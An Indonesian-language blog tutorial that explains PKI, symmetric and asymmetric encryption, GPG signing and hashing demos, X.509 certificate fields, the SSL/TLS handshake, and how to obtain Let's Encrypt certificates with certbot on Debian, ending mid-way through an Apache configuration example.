Praktik mendengarkan percakapan (eavesdropping) dan merubah pesan yang dikirim ini dalam bahasa security disebut MITM atau Man-in-the-middle attack.

Public Key Infrastructure (PKI)

PKI ini seperti satu set aturan buat me-manage digital certificate. PKI memverifikasi identitas baik itu server atau client, mengasosiasikan public key ke identitas tertentu. Gampangnya, PKI itu seperti password. Password itu cara sederhana buat memastikan identitas user, artinya identitas user diproteksi dengan password yang password ini cuma user tersebut yang tahu.

PKI juga kurang lebih seperti itu, memproteksi identitas, bukan pakai password tapi pakai encryption key.
Lebih dari itu, PKI menyelesaikan tiga problem komunikasi sekaligus:

Confidentiality.
Authentication.
Integrity.

Kita bahas satu-satu.

1) Confidentiality
Confidentiality atau kerahasiaan data diatur dalam PKI. Bagaimana caranya kita berkomunikasi satu lawan satu secara rahasia? sementara Internet itu kan jaringan publik, siapa saja bisa eavesdropping atau mendengarkan pembicaraan itu. Caranya, komunikasinya pakai kode atau bahasa yang cuma bisa dimengerti dua pihak ini, yang lain bisa dengar tapi tidak paham maksudnya.

Cara ini disebut encryption atau encipherment, istilah yang awal lebih umum dan sering dipakai. Encryption atau enkripsi ini caranya mengacak pesan digital, bit-bit digital diacak dan dibuat jadi seolah-olah tidak beraturan. Data digital ini bisa dikembalikan lagi seperti aslinya sebelum diacak, prosesnya disebut decrypt. Proses decrypt ini pakai kunci yang disebut encryption key. Jadi, cuma pemegang kunci saja yang bisa decrypt pesan itu.

Ada dua metode enkripsi yang ada saat ini, metode simetris atau symmetric encryption sama metode asimetris atau asymmetric encryption.

Symmetric encryption menggunakan kunci atau key yang sama untuk encrypt atau decrypt. Jadi antara kedua pihak yang bertukar informasi key-nya sama. Pesan di-encrypt pakai key itu, di-decrypt pakai key itu juga.

Kelebihan enkripsi metode ini, lebih cepat dibanding asymmetric encryption. Enkripsi ini juga biasanya lebih secure. Key yang dipakai untuk enkripsi ini biasanya pendek, cuma 128 bit atau 256 bit. Biarpun pendek tapi bisa lebih secure dari key asymmetric yang lebih panjang.
Algoritma enkripsi untuk tipe ini semisal AES (Advanced Encryption Standard) dan DES (Data Encryption Standard).

Kekurangannya, karena pihak yang berkomunikasi pakai key yang sama, distribusi key ini jadi problem sendiri. Karena kalau tidak hati-hati, key bisa jatuh ke tangan yang salah. Supaya aman, distribusi key ini bisa pakai cara tradisional, misalnya key disimpan ke flash disk untuk kemudian dikirim fisiknya. Kalau key ditransfer lewat jaringan Internet, ada kemungkinan key tersebut di hijack dan diterima orang yang salah.

Asymmetric encryption pakai key yang berbeda antara yang buat encrypt sama yang buat decrypt. Satu key bersifat publik yang disebut public key terus satunya lagi disebut private key yang cuma owner nya saja yang bisa akses. Siapapun yang punya public key bisa meng-encrypt data pakai public key tersebut dan yang bisa decrypt cuma pemilik private key nya.

Kelebihan metode ini, tidak ada problem distribusi key karena cuma public key saja yang di distribusikan sedangkan private key tetap aman.

Kekurangannya, biasanya metode enkripsi ini lebih lambat dari yang symmetric. Key nya juga biasanya panjang dari 1024 bit sampai 4096 bit. Algoritma enkripsi untuk metode asymmetric encryption ini seperti RSA (Rivest-Shamir-Adleman) dan DSA (Digital Signature Algorithm).

Contoh penggunaan asymmetric encryption yang populer seperti PGP, OpenPGP, dan GPG. Siapa saja bisa download public key dari keyserver terus pakai key ini buat encrypt file. File yang sudah terenkripsi ini kemudian bisa dikirim secara aman, seseorang bisa saja membajak file itu tapi karena dia tidak punya file private key-nya, file tidak bisa di-decrypt.

Ini contoh public key GPG punya saya dengan id 0x2d6783968595c582 yang ada di keyserver https://sks-keyservers.net/pks/lookup?op=vindex&search=0x2d6783968595c582.

2) Authentication
Problem komunikasi berikutnya masalah autentikasi. Autentikasi ini buat memastikan bahwa lawan bicara kita adalah benar dia, bukan orang yang berpura-pura. Dalam komunikasi IP begitu juga, user atau client yang berkomunikasi dengan situs online banking misalnya, harus memastikan bahwa yang diaksesnya itu benar-benar situs bank yang dimaksud dan bukannya situs tiruan buatan pencuri.

Teknik kejahatan cyber yang seperti ini, misalnya membuat halaman situs yang mirip situs resmi online banking supaya si user tidak sadar masuk jebakan disebut teknik phising. Salah satu tujuan PKI untuk mencegah hal ini dengan cara memastikan identitas server dengan encryption key.

Caranya, kembali ke asymmetric encryption. Selain untuk encrypt dan decrypt, metode asymmetric juga bisa buat tanda tangan digital atau istilahnya digital signature.
Kalau untuk encrypt dan decrypt, data digital di encrypt pakai public key kemudian pemilik private key yang bisa decrypt data itu. Untuk signing berlaku sebaliknya, pemilik private key menandatangani atau sign data pakai private key, kemudian siapa saja yang punya public key bisa verifikasi tanda tangan tersebut dan memastikan keasliannya.

Contoh saja, kita akses halaman situs https://www.google.com. Pertama, browser kita yang bertindak sebagai client download digital certificate dari website tersebut. Di dalam digital certificate itu ada public key dengan identitas www.google.com. Dengan begitu, client bisa encrypt data pakai public key yang sudah didownload, terus server yang bisa decrypt. Begitu juga server bisa tandatangani data digital dengan private key-nya dan client yang sudah punya public key bisa verifikasi signature tersebut.

Nah, sampai sini timbul masalah. Bagaimana kita bisa memastikan bahwa digital certificate yang didownload tadi benar-benar dari Google dan bukan server yang mengaku sebagai Google?
Kita tidak bisa memastikan, karena siapa saja bisa mengaku sebagai Google dengan membuat certificate dengan identitas www.google.com.

Terus solusinya bagaimana?
Setidaknya ada dua metode yang mengatasi problem ini, Certificate Authority (CA) dan Web of trust.

Certificate Authority atau CA ini berfungsi seperti organisasi yang punya otoritas menandatangani digital certificate. Ada banyak organisasi CA, contoh saja seperti Comodo, GeoTrust, DigiCert, dan Symantec yang dulu namanya VeriSign. Digital certificate dari para CA ini secara default sudah dimasukkan di database client, misal browser seperti Google Chrome atau Firefox. Certificate dari CA ini dianggap trusted atau terpercaya karena reputasi organisasi yang bagus dan mereka ini diaudit secara berkala.

Para CA ini yang memastikan nama identitas di digital certificate itu valid atau tidak. Misalnya Google membuat digital certificate untuk domain www.google.com, kemudian Google membuat file Certificate Signing Request (CSR) ke CA GeoTrust supaya GeoTrust menandatangani digital certificate-nya Google. Di sini GeoTrust melakukan verifikasi apakah request itu benar-benar dari Google atau tidak. Caranya bisa bermacam-macam, mulai dari verifikasi website, telepon, sampai penggunaan legal dokumen buat membuktikan identitas.
Kemudian setelah GeoTrust memastikan validitas request tersebut, CA ini signing atau secara digital menandatangani digital certificate Google, certificate ini kemudian dipakai di server Google.

Nah waktu kita browsing Google misalnya, browser melihat bahwa digital certificate punya Google ini ditandatangani oleh GeoTrust. Karena certificate GeoTrust ada di database dan dianggap terpercaya, maka digital certificate Google ini juga secara otomatis dipercaya oleh client atau browser.

Tapi biarpun begitu, CA ini jadi The weakest link di PKI. Karena kalau misalnya private key punya CA berhasil dicuri, maka pencuri tersebut bisa seenaknya menandatangani atau signing certificate apa saja, termasuk situs phising. Atau misalnya organisasi CA ini secara diam-diam bekerjasama atau berbagi private key dengan organisasi rahasia untuk memata-matai pengguna Internet, kita tidak akan tahu bedanya.

Web of trust. Ini alternatif lain selain CA. Web of trust ini dipakai di PGP/OpenPGP/GPG. Bedanya, tidak ada satupun otoritas di sini. Web of trust ini seperti jaring, misalnya kita set public key teman kita si B sebagai trusted, dan si B juga mempercayai public key si C, maka public key punya si C juga dianggap trusted. Begitu seterusnya sampai membentuk jaringan kepercayaan.

3) Integrity
Satu lagi masalah data integrity. Bagaimana PKI meyakinkan dua pihak yang berkomunikasi secara digital bahwa data atau pesan yang dikirim dan diterima itu tidak mengalami perubahan di tengah jalan, bahwa data yang diterima itu benar data yang dikirim.

Ada beberapa cara buat mengecek integritas data.

Digital Signature.
Message digest atau Hash.
Message Authentication code (MAC).

Digital Signature seperti yang sudah dibahas di atas tentang autentikasi. Digital signing ini caranya si pengirim menggunakan private key-nya untuk sign data digital, tandatangan digital sama datanya kemudian dikirim bersama. Si penerima yang sudah punya public key memeriksa validitas signature tersebut. Kalau misalnya di tengah jalan data ini mengalami perubahan, maka signature tersebut jadi tidak valid dan si penerima tahu bahwa data ini tidak sama dengan data yang dikirim.

Mari dicoba.
Misal saya buat file text yang isinya “abcde”, kemudian file tersebut Saya sign. File signature terpisah dengan nama text.signature

[dhani: ~] Endor > echo "abcde" > text
[dhani: ~] Endor > gpg -u dhani.stx@gmail.com --armor --output text.signature --detach-sig text

You need a passphrase to unlock the secret key for
user: "Dhani Setiawan <dhani.stx@gmail.com>"
2048-bit RSA key, ID 8595C582, created 2016-08-27

Hasil signature seperti di bawah:

[dhani: ~] Endor > cat text.signature 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAABAgAGBQJYU5YtAAoJEC1ng5aFlcWCrA8H/3vZI0+CBAW0NwrewslSDmFi
WKvUiCV1JQQtZcjT6ljCFLIk7MvtN5s00aEgySTLKRbnOWeL4HO2oNaI0LgjCfB9
b46LO74Z+2DSBattr5dWG+fusAcOQDblakSItHUG3BpeFQOaPhdjctk4hEm2FKmj
JVkbSqLWf6VOZe2+F0Zz81tYuJkVlIO7oxW6rzZCYucO98/piyoJQzrrupOio8jr
N9uxTeNJBuAKMprU9rEHf0VSwMw4baPKzgf/wGht7E/EQgkz9RVuN8zWNxpFgdDI
fbfCGgMvxxuC2+dzUASz6Ca2jZMOM6k8r8OXdtTpSd5erf1FI88U9df4oh2kDjs=
=K/SY
-----END PGP SIGNATURE-----

Coba diverifikasi signature itu.

[dhani: ~] Endor > gpg --verify text.signature text
gpg: Signature made Fri 16 Dec 2016 03:22:21 PM WITA using RSA key ID 8595C582
gpg: Good signature from "Dhani Setiawan <dhani@deltatux.com>"
gpg:                 aka "Dhani Setiawan <dhani.stx@gmail.com>"

Apa yang terjadi kalau isi file text dirubah, misalnya rubah huruf terakhir jadi huruf besar, kemudian verifikasi signature-nya.

[dhani: ~] Endor > echo "abcdE" > text
[dhani: ~] Endor > gpg --verify text.signature text
gpg: Signature made Fri 16 Dec 2016 03:22:21 PM WITA using RSA key ID 8595C582
gpg: BAD signature from "Dhani Setiawan <dhani@deltatux.com>"
[dhani: ~] Endor >

Kalihatan antara file dengan signaturenya tidak cocok.

Kelemahan metode ini, karena pakai public dan private key yang berarti asymmetric, maka prosesnya lebih lambat dibanding cara yang lain.

Message digest atau Hash. Hampir sama dengan digital signing, hanya saja tidak pakai encryption key apapun, cuma algoritma hashing. Data digital yang dikirim terlebih dulu di hash, kemudian data sama hash-nya dikirm. Si penerima data juga kalkulasi hash data itu, terus membandingkan apa hash yang dihasilkan sama atau tidak. Kalau sama berarti data itu valid kalau tidak berarti data itu sudah dimodifikasi.

Beberapa algoritma hashing misalnya MD5, SHA1 dan SHA256. hash MD5 panjangnya 128 bit, SHA1 160 bit, dan SHA256 sepanjang 256 bit.

Perhatikan hasil hash text “abcde” di bawah:

[dhani: ~] Endor > echo "abcde" | md5sum
9b9af6945c95f1aa302a61acf75c9bd6  -
[dhani: ~] Endor > echo "abcde" | sha1sum
ec11312386ad561674f724b8cca7cf1796e26d1d  -
[dhani: ~] Endor > echo "abcde" | sha256sum
0283da60063abfb3a87f1aed845d17fe2d9ba8c780b478dc4ae048f5ee97a6d5  -
[dhani: ~] Endor >

Hash MD5 dan SHA1, sekarang ini sudah dianggap tidak lagi secure karena pendek. Artinya kemungkinan dua data yang berbeda menghasilkan hash yang sama lebih besar dibanding hash yang panjang.

Kita ambil contoh hash SHA256, data “abcde” dirubah ke “abcdE”, cuma berubah di karakter terakhir.

[dhani: ~] Endor > echo "abcde" | sha256sum
0283da60063abfb3a87f1aed845d17fe2d9ba8c780b478dc4ae048f5ee97a6d5  -
[dhani: ~] Endor > echo "abcdE" | sha256sum
98f2c74c952a79ac39fffc5c6beb301c267cfeaeb898d840b1482350fc4e9b91  -
[dhani: ~] Endor >

Biarpun perbedaan itu cuma antara huruf kecil dan besar, hasil hash berbeda.

Perlu diingat bahwa hash cuma berguna buat memastikan integritas data, tidak bisa memastikan identitas pengirim data.

Message Authentication Code (MAC). Kurang lebih seperti digital signature, hanya saja key yang dipakai di sini shared key yang berarti symmetric encryption. Kalau hash inputnya cuma satu, data saja, MAC inputnya dua, data sama key. MAC fungsinya hampir sama dengan digital signature, selain buat memastikan integritas data juga sebagai autentikasi bahwa data yang dikirim itu berasal dari pengirim yang memegang key-nya. Penerima data digital menerima data bersamaan dengan kode MAC-nya, kalau data ini dibuat dari key yang berbeda maka kode MAC itu jadi tidak valid. Begitu juga kalau data dimodifikasi di tengah jalan, kode MAC juga akan berbeda.

Kelebihan MAC, karena pakai symmetric encryption jadinya lebih cepat proses generate kode sama proses verifikasinya dibanding digital signature. Kelemahannya juga sama seperti symmetric encryption, tidak bisa memastikan dari siapa data itu dikirim karena siapa saja yang punya enryption key bisa mengirim data yang valid.

X.509

Baik, setelah membahas tentang Public Key Infrastructure atau PKI di atas, sekarang kita lihat seperti apa digital certificate itu.

Salah satu standar format digital certificate PKI adalah X.509. Digital certificate standar X.509 ini yang dipakai di SSL dan TLS.

Digital certificate yang pakai standard X.509 berisi informasi-informasi atau struktur seperti di bawah:

Version atau versi X.509. Ada X.509 versi 1, 2 dan 3.
Serial Number. Serial dari pembuat digital certificate yang membedakan dari certificate lainnya.
Algorithm. Informasi tentang algoritma yang dipakai untuk membuat digital certificate. Algoritma seperti yang sudah dibahas sebelumnya tentang confidentiality PKI.
Issuer atau organisasi Certificate Authority (CA) yang mengeluarkan digital certificate.
Validity berisi informasi tentang mulai kapan sampai kapan certificate ini validnya, tanggal expire nya.
Subject DN. Isinya tentang identitas pemilik digital certificate ini, dari nama sampai alamat email.
Public key. Public key asymmetric encryption seperti yang sudah dibahas sebelumnya.

Selain yang di atas itu, ada beberapa informasi yang sifatnya opsional seperti extension X.509.

Sebagai contoh, di bawah ini digital certificate X.509 yang dipakai blog DevNull ini.

openssl x509 -noout -text -in devnull.web.id/fullchain.pem 
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            03:ac:ba:ea:90:d4:7c:b6:17:76:d7:23:75:af:f8:1a:73:89
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
        Validity
            Not Before: Dec  9 14:42:00 2016 GMT
            Not After : Mar  9 14:42:00 2017 GMT
        Subject: CN=devnull.web.id
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:d7:03:8f:1b:50:43:04:bf:f4:bc:bc:ed:77:5c:
                    1c:12:e0:ec:14:14:2e:92:3b:eb:05:54:77:ec:99:
                    01:02:5d:62:ea:cb:79:af:1a:53:d0:49:2b:65:f9:
                    97:be:11:8d:99:bf:2a:2d:e7:63:2e:dc:0b:ff:2f:
                    21:89:17:2f:64:42:37:fc:e9:ef:95:d2:38:77:20:
                    7d:19:ba:ea:35:43:96:2c:70:23:13:97:55:2d:da:
                    78:50:51:66:0f:3f:5c:6e:46:62:20:4a:f4:e0:b9:
                    54:35:94:1d:b7:43:19:51:9f:4c:18:13:9f:f8:a6:
                    e7:b0:64:06:d0:a6:ba:b5:be:cd:e8:35:bc:44:2a:
                    85:9a:6b:00:8e:d3:e7:73:ff:23:a3:fd:4e:3c:e0:
                    f9:9e:3c:be:6e:e7:64:b6:b2:eb:06:20:eb:32:53:
                    a9:10:ea:c1:1f:90:eb:ca:23:8a:14:1a:88:3b:90:
                    ea:f1:e8:41:e4:41:63:99:01:3b:bd:5a:78:61:23:
                    3b:b8:78:5a:e3:22:e7:7a:d9:f1:81:b8:59:91:4a:
                    b5:ec:5e:3b:e1:53:17:23:d1:74:75:77:c4:be:e1:
                    4a:cd:8d:e3:fa:f1:2b:5f:93:87:e4:0c:42:0b:f6:
                    28:69:86:31:97:b8:a5:b1:48:b4:ea:03:07:4b:41:
                    ea:99
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Key Usage: critical
                Digital Signature, Key Encipherment
            X509v3 Extended Key Usage: 
                TLS Web Server Authentication, TLS Web Client Authentication
            X509v3 Basic Constraints: critical
                CA:FALSE
            X509v3 Subject Key Identifier: 
                8F:A5:A9:96:A7:D0:1A:53:3E:D9:B2:16:18:29:A0:06:31:CD:6F:9E
            X509v3 Authority Key Identifier: 
                keyid:A8:4A:6A:63:04:7D:DD:BA:E6:D1:39:B7:A6:45:65:EF:F3:A8:EC:A1

            Authority Information Access: 
                OCSP - URI:http://ocsp.int-x3.letsencrypt.org/
                CA Issuers - URI:http://cert.int-x3.letsencrypt.org/

            X509v3 Subject Alternative Name: 
                DNS:devnull.web.id
            X509v3 Certificate Policies: 
                Policy: 2.23.140.1.2.1
                Policy: 1.3.6.1.4.1.44947.1.1.1
                CPS: http://cps.letsencrypt.org
                User Notice:
                    Explicit Text: This Certificate may only be relied upon by Relying Parties and only in accordance with the Certificate Policy found at https://letsencrypt.org/repository/

    Signature Algorithm: sha256WithRSAEncryption
        2c:ee:d4:c4:c1:30:d4:4c:60:42:f8:6d:8e:db:cf:86:f3:ae:
        b7:d9:3a:7b:8c:60:31:29:be:7b:a0:9d:f7:49:1c:53:e2:34:
        8e:9b:68:d3:72:b0:97:7c:7f:56:29:fa:80:ab:a9:40:a4:99:
        39:47:9e:9d:af:ea:c6:61:17:f3:18:a5:c9:1e:73:cc:9e:8b:
        25:7d:76:16:54:ea:f8:ec:e0:27:41:43:61:1a:54:9a:14:ba:
        c8:a4:a2:20:64:84:6d:b4:ac:d7:48:e0:d1:e4:a3:2a:92:ae:
        a1:d4:c8:86:2c:8a:f4:7a:0c:27:d3:ac:7f:51:11:a7:38:a8:
        a7:4a:c8:3c:4a:11:b3:81:e7:25:bc:59:15:b0:51:88:2e:b7:
        73:a4:73:bb:1a:f3:78:36:60:18:75:a1:a4:eb:b7:08:0d:6c:
        20:26:bd:e1:76:fc:bc:77:ca:52:c5:43:bb:46:ab:5b:67:4f:
        c8:7b:20:b4:1f:7b:b2:52:13:35:e3:80:ea:9f:55:4d:c1:04:
        59:69:44:55:d6:fb:ba:ae:97:fa:fc:73:fa:94:47:cd:30:8e:
        93:cd:a7:1c:1a:1d:45:9a:e6:d0:2e:94:c6:84:c9:38:a0:5b:
        35:e4:8a:8e:fe:d8:49:d7:a0:71:9f:c3:c8:02:23:ab:95:ca:
        eb:72:8e:b6

Jadi, kata “sertifikat SSL” yang sering kita dengar itu sebenarnya istilah marketing, istilah teknis yang benar adalah sertifikat X.509. Cuma karena sertifikat ini sering dipakai di SSL, makanya jadi lebih terkenal sebagai “sertifikat SSL”, padahal TLS juga pakai standar sertifikat X.509 yang sama.

SSL/TLS

SSL (Secure Socket Layer) dan TLS (Transport Layer Security), dua kata yang kadang membingungkan, paling tidak buat saya begitu. Maksudnya begini, kadang SSL dan TLS ini dua hal yang berbeda yang tidak bisa ketemu. Tapi kadang SSL dan TLS ini adalah hal yang sama. SSL ya TLS, TLS ya SSL, karena itu biasanya ditulis SSL/TLS. saya rasa ini penting untuk dipahami bahwa ada maksud yang ambigu di dua kata ini.

SSL/TLS ini sama-sama implementasi security PKI dan pakai digital certificate X.509.

Kita bahas dulu perbedaannya, bahwa SSL dan TLS ini dua hal yang berbeda yang tidak bisa ketemu.
Kalau membahas perbedaannya, yang dimaksud dengan SSL dan TLS adalah protokolnya. Mereka ini SSL dan TLS berbicara dengan bahasa yang berbeda, karena itu tidak bisa ketemu.
TLS ini seperti evolusi dari SSL, SSL awalnya didevelop dari Netscape. saya ambil dari Wikipedia, bahwa versi pertama SSL yaitu versi 1.0 tidak pernah dirilis karena banyak celah keamanan. Begitu juga SSL 2.0 yang masih banyak kekurangan, yang akhirnya melahirkan versi ketiga SSL 3.0 yang merupakan hasil design ulang protokol sebelumnya.

Terus kemudian muncul TLS 1.0 sebagai successor dari SSL 3.0. Bedanya, TLS ini standar dari Internet Engineering Task Force atau IETF dan bukan dari Netscape lagi yang berarti bahwa TLS ini standar terbuka. Tapi biarpun TLS 1.0 ini penerus SSL 3.0, dua protokol ini tidak kompatibel. saya tidak memahami detailnya, tapi salah satu perbedaan mendasar adalah di Message Authentication Code atau MAC yang sudah dibahas di atas. MAC di SSL pakai block cipher sedangkan di TLS pakai hash yang lebih dikenal dengan HMAC.

Setelah TLS 1.0, disusul TLS 1.1 dan yang sekarang adalah TLS 1.2. Versi TLS yang selanjutnya TLS 1.3 yang sekarang masih berbentuk draft di IETF.

Waktu komunikasi secure antara server sama client, terlebih dulu ada proses handshake atau negosiasi parameter antara TLS di server dan client. Client akan meng-advertise ke server bahwa dia support SSL 3.0, TLS 1.0, TLS 1.1, dan TLS 1.2 misalnya. Berdasarkan informasi ini, server akan memilih protokol yang cocok dan secara default akan memilih yang paling baru. Misalnya si server cuma bisa sampai TLS 1.1 maka ini yang dipilih.

Sekarang ini SSL 3.0 dianggap sudah tidak lagi aman, karena itu kebanyakan server tidak menyertakan protokol ini waktu proses handshake. Salah satu penyebab SSL 3.0 ditolak server karena ada vulnerability yang dikenal dengan POODLE, baca lebih lanjut tentang POODLE di https://en.wikipedia.org/wiki/POODLE

Kemudian kita bahas persamaan dua kata ini SSL dan TLS. Kalau sebelumnya, perbedaan mereka ini ada di protokol atau bahasa yang dipakai, persamaan ini lebih ke pembedaan saja antara komunikasi yang aman sama yang tidak.

Contohnya begini, Hypertext Transfer Protocol atau HTTP itu berjalan di atas protokol TCP di port 80 yang sifatnya terbuka dan tidak aman. Ada HTTP yang sifatnya secure yang disebut HTTPS, dan ini berjalan di atas protokol TCP port 443. Jadi ada dua HTTP, yang aman di port 443 dan yang tidak terenkripsi di port 80. Kalau di address bar browser, url untuk SSL/TLS diawali https:// sedangkan non SSL/TLS http://

Contoh yang lain seperti protokol email:

SMTP. SMTP di port 25 dan SMTP SSL/TLS di port 465, umumnya disebut smtps.
POP3. POP3 di port 110 dan POP3 SSL/TLS di port 995, disebut pop3s.
IMAP. IMAP di port 143 dan IMAP SSL/TLS di port 993, atau imaps.

Secara teknis, port yang secure itu pakai protokol TLS. Tapi mengapa masih disebut juga SSL itu saya kurang paham, mengapa tidak disebut saja HTTP TLS atau SMTP TLS.

Dari sini, kita jadi paham bahwa maksud penulisan SSL/TLS ini adalah bahwa SSL dan TLS ini hal yang sama.

Terus kalau diperhatikan, masing-masing komunikasi itu ada di dua port yang berbeda. Sekarang ini yang seperti itu dianggap wasted atau buang-buang resource, karena itu sekarang ini ada lagi yang namanya STARTTLS.
Apa bedanya? bedanya kalau SSL/TLS pakai port yang berbeda untuk komunikasi yang secure, STARTTLS pakai port yang sama. Jadi SMTP tetap di port 25, komunikasi dimulai dari tidak terenkripsi kemudian diswitch atau dirubah ke komunikasi terenkripsi yang aman tapi tetap di port yang sama.

SSL/TLS Handshake

Sebelum bisa bertukar data secara secure, antara client dan server perlu negosiasi dulu, proses ini namanya handshake. Proses ini diperlukan karena implementasi dan support algoritma enkripsi antara client dan server bisa beda, jadi perlu adanya kesepakatan.

Proses SSL/TLS Handshake kurang lebih seperti di bawah:

Client mengirim “client hello” ke server. “client hello” ini berisi informasi CipherSuite atau algoritma apa saja yang disupport oleh client, versi SSL atau TLS juga diinformasikan di sini.
Server membalas “client hello” itu dengan “server hello” yang berisi CipherSuite yang dipilih server. Bersamaan “server hello” ini dikirim juga digital certificate server.
Client memeriksa validitas digital certificate yang dikirm server. Kalau digital certificate itu tidak valid entah karena alasan apapun, misalnya sudah expired atau digital certificate itu tidak dipercayai oleh client, maka proses handshake berhenti.
Sebaliknya, kalau digital certificate itu valid dan trusted, maka client membuat semacam password yang disebut pre-master secret yang diambil dari byte string yang acak. Pre-master secret ini kemudian dienkripsi dengan public key server, public key ini ada di dalam certificate. Kemudian pre-master secret yang sudah terenkripsi dikirim ke server.
Server kemudian men-decrypt pre-master secret itu dengan private key-nya.
Sampai di sini, client dan server yang sudah punya pre-master secret yang sama. Kemudian mereka berdua membuat symmetric encryption key berdasarkan pre-master secret tadi. Key ini yang nantinya dipakai buat encrypt dan decrypt data.
Client mengirim pesan “finished”.
Server mengirim pesan “finished”.

Setelah proses handshake di atas selesai, masing-masing client dan server bisa kirim dan terima data dengan terenkripsi pakai symmetric key. Perlu diingat bahwa symmetric encryption key yang dibuat tadi cuma berlaku di session itu, session lain lagi key-nya baru lagi.

Kelihatan dari sini bahwa SSL/TLS ini pakai dua metode enkripsi yang berbeda, asymmetric dan symmetric. Asymmetric encryption dipakai waktu handshake supaya symmetric key bisa dibuat dengan aman, sedangkan symmetric key dipakai untuk komunikasi data.

Kita ingat lagi di atas, kelebihan symmetric encryption adalah kecepatannya. Sedangkan kelemahannya adalah distribusi key, dan penggunaan asymmetric encryption dipakai menutupi kekurangan itu. Di proses handshake di atas tidak ada distribusi key, tapi masing-masing client dan server membuat key berdasarkan pre-master secret yang dienkripsi pakai public key server.

Free digital certificate dari Let’s Encrypt

Baik, pertama saya kutip dulu dari situs https://letsencrypt.org

Let’s Encrypt is a free, automated, and open certificate authority (CA), run for the public’s benefit. It is a service provided by the Internet Security Research Group (ISRG).

We give people the digital certificates they need in order to enable HTTPS (SSL/TLS) for websites, for free, in the most user-friendly way we can. We do this because we want to create a more secure and privacy-respecting Web.

Sebelum Let’s Encrypt, sudah ada beberapa CA yang punya certificate gratis. Kebanyakan mereka itu provider hosting, yang kalau kita langganan hosting di situ kita dapat free SSL/TLS certificate. Ada juga StartSSL, CA dari perusahaan StartCom yang berbasis di.. ~~batuk..~~ Israel.

Ada juga CAcert, oraganisi CA non profit. saya sendiri sudah lama pakai certificate dari CA ini, kekurangannya CA ini adopsinya kurang luas. Debian sendiri yang dulu defaultnya ada certificate dari CA ini sekarang sudah tidak di-include-kan lagi.

Certificate authority atau CA ada yang namanya Root CA sama Intermediate CA. Jadi CA aslinya yang root, hanya saja untuk keamanan root CA ini tidak langsung mengeluarkan SSL/TLS certificate. Root CA ini mengeluarkan atau secara digital menandatangani certificate untuk CA lain yang disebut Intermediate CA. Intermediate CA ini yang kemudian melayani permintaan certificate atas nama root CA.
Root CA bisa saja punya lebih dari satu Intermediate CA, dan karena proses penandatanganan certificate sudah didelegasikan ke Intermediate CA, private key dari root CA bisa disimpan secara offline di tempat yang aman, aman dari pencurian termasuk juga aman dari force majeure seperti kebakaran.

Nah, Let’s Encrypt di sini perannya adalah sebagai Intermediate CA, sedangkan root CA nya adalah DST Root CA X3 yang secara default sudah ada di browser atau SSL/TLS client.

Instalasi

Untuk instalasinya, Let’s Encrypt perlu memastikan bahwa kita adalah benar sebagai pemilik domain dan website. Salah satu dari tiga cara bisa diambil buat verifikasi ini.

Memanfaatkan web server yang sudah running, misal Apache2 atau Nginx.
Standalone web server dari Let’s Encrypt client.
Manual, cara terakhir yang agak ribet. Cara ini diambil kalau kita tidak punya akses ke web server, misalnya website kita ada di shared hosting yang tidak punya fasilitas install Let’s Encrypt.

Karena system yang saya pakai Debian Jessie, mungkin saja cara di bawah ini tidak bisa diaplikasikan ke system lain.

Pertama, install Let’s Encrypt client yang bernama certbot pakai user root.

apt-get update && apt-get install -y certbot

Kalau kita mau pakai web server yang sudah running, mungkin karena alasan traffic website yang tinggi sehingga web server tidak bisa di shutdown, kita perlu install plugin buat web server itu.
Untuk plugin Apache2

apt-get install python-certbot-apache

Untuk Nginx, ganti saja apache dengan nginx.

Yang perlu kita input ke program certbot adalah nama domain dan email untuk keperluan registrasi dan recovery. Kalau di server yang sama ada lebih dari satu domain, kita bisa buat satu sertifikat saja untuk semua domain tersebut.

Cara pertama, pakai existing web server, Apache2 misalnya:

certbot certonly --apache --agree-tos --email hostmaster@example.com --domain example.com

certonly di sini kita maksudkan bahwa kita cuma perlu certificate saja.
--agree-tos Term of service dari protokol komunikasi Automated Certificate Management Environment (ACME).
--email Sesuaikan email yang valid.
--domain nama domain sebagai identitas di certificate.

Untuk domain yang lebih dari satu, bisa seperti di bawah:

certbot certonly --apache --agree-tos --email hostmaster@example.com --domain example.com --domain example2.com

Cara kedua pakai builtin web server certbot.
kalau web server masih running, kill dulu.

killall apache2

Saya pakai command killall apache2 karena entah alasan apa command systemctl stop apache2 tidak bisa shutdown service apache2.

certbot certonly --standalone --agree-tos --email hostmaster@example.com --domain example.com

Setelah proses selesai, hidupkan lagi web server.

systemctl start apache2

Cara ketiga, manual. Ini dipakai kalau misalnya kita langganan shared hosting yang kita tidak punya akses ssh ke server, web hosting tersebut tidak ada fitur install Let’s Encrypt, dan support mereka tidak bisa membantu instalasi Let’s Encrypt atau bahkan tidak tahu apa itu Let’s Encrypt.

Caranya adalah, certbot kita install di laptop atau pc desktop misalnya, kemudian dari laptop itu eksekusi command certbot seperti dibawah:

certbot certonly --manual --agree-tos --email hostmaster@example.com --domain example.com

Untuk cara manual, akan muncul warning dari certbot bahwa ip address kita dilog di server Let’s Encrypt.
Lewat cara ini, Let’s Encrypt akan menginformasikan bahwa kita perlu upload file ke website, file ini berisi string sesuai instruksi certbot. Cara verifikasi ini mirip seperti verifikasi Google, yang kita perlu upload file tertentu ke website kita.

Begitu sukses instalasi, digital certificate ada di /etc/letsencrypt/live/example.com/ example.com cuma contoh saja. Ada 4 file yang keterangannya seperti di bawah:

chain.pem Ini adalah file digital certificate Let’s Encrypt, Intermediate CA kita.
cert.pem Ini digital certificate kita yang sudah ditandatangani Let’s Encrypt.
fullchain.pem Gabungan antara chain.pem dan cert.pem. File ini yang nantinya dipakai di web server karena kebanyakan browser tidak ada certificate Lets’s Encrypt, maka certificate dari Intermediate CA kita perlu disertakan supaya membentuk chain lengkap dari kita ke Let’s Encrypt sampai ke Digital Signature Trust (DST Root CA) yang root CA ini sudah ada di browser client.
privkey.pem Ini adalah private key kita seperti yang sudah dibahas sebelumnya tentang asymmetric encryption. File ini yang harus kita jaga kerahasiannya.

Setelah itu, tinggal kita pakai file-file ini di konfigurasi web server, contoh untuk Apache2.

SSLEngine               on
SSLCertificateFile      /etc/letsencrypt/live/example.com/fullchain.pem
